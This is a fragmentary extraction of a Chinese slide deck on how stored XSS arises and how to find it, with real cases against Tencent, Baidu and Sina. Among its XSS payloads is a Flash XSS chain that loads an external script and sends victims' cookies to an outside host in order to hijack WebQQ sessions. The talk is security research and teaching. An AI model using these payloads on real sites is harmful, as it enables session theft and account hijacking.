存儲型xss成因及挖掘方法

1、存儲型XSS的成因及挖掘方法,USERID: Gainover (g_@live.com)GROUP: PKAV Group,2012-7-28,www.pkav.net,| www.wooyun.org,| www.toolmao.com,什么是XSS攻擊？,,攻擊者,注入惡意代碼,查看他人資料查看一篇日志查看一條留言查看一個評論查看一個問題查看一個答案點開一個鏈接點開一個郵件……,惡意代碼執(zhí)行,受害者,XS

2、S模型,當受害者變?yōu)楣粽邥r，下一輪受害者將更容易被攻擊，威力更加明顯！,用戶信息,私密信息：日志，相片，郵件,管理信息,后臺地址，管理員帳號信息甚至直接通過Ajax上傳Shell,客戶端信息,針對瀏覽器缺陷實施攻擊,突破瀏覽器的域限制,360, 傲游等瀏覽器的命令執(zhí)行,XSS,Xss蠕蟲攻擊,DDoS攻擊,XSS攻擊可以用來做什么？,,,惡意代碼存放位置,地址欄,數(shù)據(jù)庫,惡意代碼效果,用戶點擊惡意鏈接打開時執(zhí)行惡意代碼，隱蔽性差,

3、http://www.wooyun.org,,,,用戶瀏覽帶有惡意代碼的"正常頁面"時觸發(fā)，隱蔽性強,,,http://pkav.net,Non-persistent,Persistent,反射型XSS,XSS Filter,掃描器,WAF產(chǎn)品,但是危害越來越小….,但是容易被掃….,但是容易被干掉……,存儲型XSS,廣泛存在,,,輸出內(nèi)容,輸出未過濾,HTML-Context,JS-Context,Css-Con

4、text,輸出已過濾,Dom-Based操作,eval,innerHTML,setTimeout,setInterval,document.write,根據(jù)輸出內(nèi)容所處的位置來分類。,經(jīng)常需要二次過濾，但程序員忽略掉了。,會自動發(fā)生一些轉(zhuǎn)義,Flash-based XSS,其它/HTML文件,wooyun-2010-07831 (random_) 百度某分站存儲型XSS,惡意代碼的輸入,惡意代碼的輸出,惡意代碼的執(zhí)行

5、,,, 替換為 < >,判斷存在 ,禁止提交,wooyun-2010-09111 (gainover) 點點網(wǎng)存儲型XSS,JS-Context 存儲型XSS的利用方式:,閉合當前腳本，然后輸入自定義內(nèi)容。,2. 根據(jù)JS上下文，構(gòu)造正確的閉合。,過濾 ,/,替換為 (網(wǎng)易郵箱),根據(jù)實際情況，進行過濾。通常輸出是字符串，在’和"之間，過濾’,"即可,wooyun-2010-0232

6、1(Clouds) 百度貼吧存儲型XSS,和中的XSS一樣，過濾 ’ 和 ",而實際上，在HTML的屬性里，也是可以被執(zhí)行的！,,進一步構(gòu)造利用代碼,還需要將&過濾為&,,通常情況下，可能會將過濾掉了，因而無法使用此方式,1. 如果未做過濾，可以用 … 的方式來調(diào)用,CSS-Context 存儲型XSS的利用方式:,2. 直接根據(jù)CSS上下文構(gòu)造閉合,根據(jù)CSS類型對輸出進行嚴格糾正例如：字體大小，

7、必須為數(shù)字，圖片地址不允許出現(xiàn)非法字符,IE 6, 7, 8,wooyun-2010-05967 (gainover, QQ空間存儲型XSS),wooyun-2010-01101 (呆子不開口, 網(wǎng)易微博換膚XSS),5. http://zone.wooyun.org/content/465,除了….中可以被寫入CSS數(shù)據(jù)之外，還有其它位置也可以：,2. ,3. @import "data:,*%7bx:expression

8、(if(!window.x)%7balert(1);window.x=1%7d)%7D";,1. ,4. XXX,,,,,,(郵箱XSS的最愛),,(部分內(nèi)容參考html5sec.org),數(shù)據(jù)輸出, 我是輸出 ,,var x=$("x").value;var x=$("x").getAttribute("picurl");,var obj=eval("

9、("+x+")");$("result").innerHTML=x;,,DOM操作,,name 字段是昵稱，我們可以自行設(shè)置！,接著我們做以下測試：,Gainover ? Gainover<iframe>,對JS熟悉一點的則可能想到：,于是，我們測試引號是否被過濾!,Gainover" ? Gainover",放棄？,,v

10、ar data=$("json").value;,wooyun-2010-09732 (gainover,百度首頁XSS后門),這一類漏洞經(jīng)常出現(xiàn)的場景…..,點擊查看大圖, 點擊播放音樂,自動播放音樂。。,,當用戶點擊查看大圖的時候，執(zhí)行的代碼往往是：,function test(){alert($("pic").getAttribute("bigpic"));$(&

11、quot;bigimage").innerHTML="";},wooyun-2010-02490 (gainover, 騰訊微博XSS),wooyun-2010-03317 (gainover,QQ郵箱音樂功能XSS),共同點：讀取自定義屬性，然后進行innerHTML操作。,解決方案：在讀取屬性之后，對屬性中的特殊字符進行二次過濾。,.innerHTML="\uXXXX" 引發(fā)的慘案

12、,wooyun-2010-08487 (gainover,騰訊WEBQQ聊天功能XSS),實際案例,大多數(shù)廠商的做法,將\替換為\\,將\替換為/,對data.name進行二次過濾，替換 為 < >,wooyun-2010-010167 (imlonghao, 搜狐微博 XSS),,,Flash XSS,存儲型,反射型,,正常的存儲行為,圖片上傳組件，視頻播放器，音樂播放器…,,,日志HTML未過濾，或過濾

13、不嚴,FLASH相冊，對加載圖片未判斷,其它一些有加載圖片功能的FLASH應(yīng)用,第三方插件,第三方應(yīng)用,sameDomain策略,常規(guī)的Flash-based存儲型XSS,,1. 最低級的漏洞Always && FLASH地址任何填寫,wooyun-2010-07684 (gainover, QQ空間禮物功能XSS)wooyun-2010-08354 (gainover,百度貼吧存儲型XSS),,2. 稍微進化一

14、點…Always && FLASH地址固定 &&FLASH會調(diào)用外部圖片或SWF文件,正常的FLASH,惡意FLASH,參數(shù)?url=xxx.jpg,,讀取配置文件,xxx.jpg,,wooyun-2010-01768 (p.z, 新浪微博存儲型XSS)wooyun-2010-01634 (p.z, 百度i貼吧存儲型XSS),,3. 再次進化一點…sameDomain + 同域名下反射型FLAS

15、H XSS,sameDomain策略,只允許使用同域名下的FLASH文件,無法執(zhí)行了吧～，高枕無憂,同域名下的缺陷型FLASH文件,不同域名下的惡意FLASH文件,,程序員 B,程序員 A,被惡意利用,,同域名下允許上傳FLASH文件,某黑客,wooyun-2010-03314 (gainover, QQ郵箱XSS),wooyun-2010-06103 (gainover, QQ空間存儲型XSS),allowscriptaccess=&

16、quot;sameDomain"allowscriptaccess 默認屬性,,loaderInfo.parameters,xxx.swf?func = JS代碼,flashvars="func=JS代碼",App.baidu.com,百度應(yīng)用,iframe,xxx.duapp.com,iframe,App.baidu.com/xxx.swf,合法的存儲行為,,開發(fā)者,developer.com,……….

17、.,黑客(本身是開發(fā)者),攻擊,,反射型FLASH XSS,1. FLASH開發(fā)人員缺乏安全意識(jwplayer, open flash chart, swfupload類程序…),2. FLASH XSS 可以繞過主流瀏覽器的XSS Filter,3. 傳統(tǒng)掃描器不易掃描,WooYun-2012-07050,Wooyun-2010-07085,(新浪微博，淘寶網(wǎng)Cookies盜取),Wooyun-2010-08318(gaino

18、ver,百度應(yīng)用XSS),受害者,http://xsst.sinaapp.com/webqqbg.php,Iframe調(diào)用,http://web.qq.com/swf/FileUploader.swf?callback=(function(){function j(w){window.s=document.createElement('script');window.s.src='//xsst.sinaapp.c

19、om/'%2bw%2b'.js';document.body.appendChild(window.s)}j('jq');j('wq')})(),Flash xss,xsst.sinaapp.com/wq.js,http://xsst.sinaapp.com/getvfqq.php?cookie={Cookie數(shù)據(jù)},http://s.web2.qq.com/api/get_sel

20、f_info2,獲取vfwebqq參數(shù),http://cgi.web2.qq.com/keycgi/qqweb/newuac/set.do,設(shè)置主題,調(diào)用外部JS,獲取cookies,劫持,騰訊WEBQQ的持久劫持,Wooyun-2010-07999,1. 拿著各種XSS Vector填入到輸入處，然后看頁面是否有“執(zhí)行”,,&,3. 看功能異常，看報錯,&,,構(gòu)造利用代碼,,查明缺陷,,檢查原因,,,傳統(tǒng)輸入點

21、各種表單，input[text], textarea隱藏輸入點Input[hidden]客戶端腳本過濾,,進一步測試,,瀏覽器調(diào)試工具 (F12),抓包工具,,,HttpwatchFiddlerCharles,4. 遭遇驗證碼,看到一些提交的隱藏參數(shù)。,找到一個XSS點之后,,alert(/xss/);alert(document.cookie);,輸入點長度限制,突破長度限制,,漏洞的利用,http-only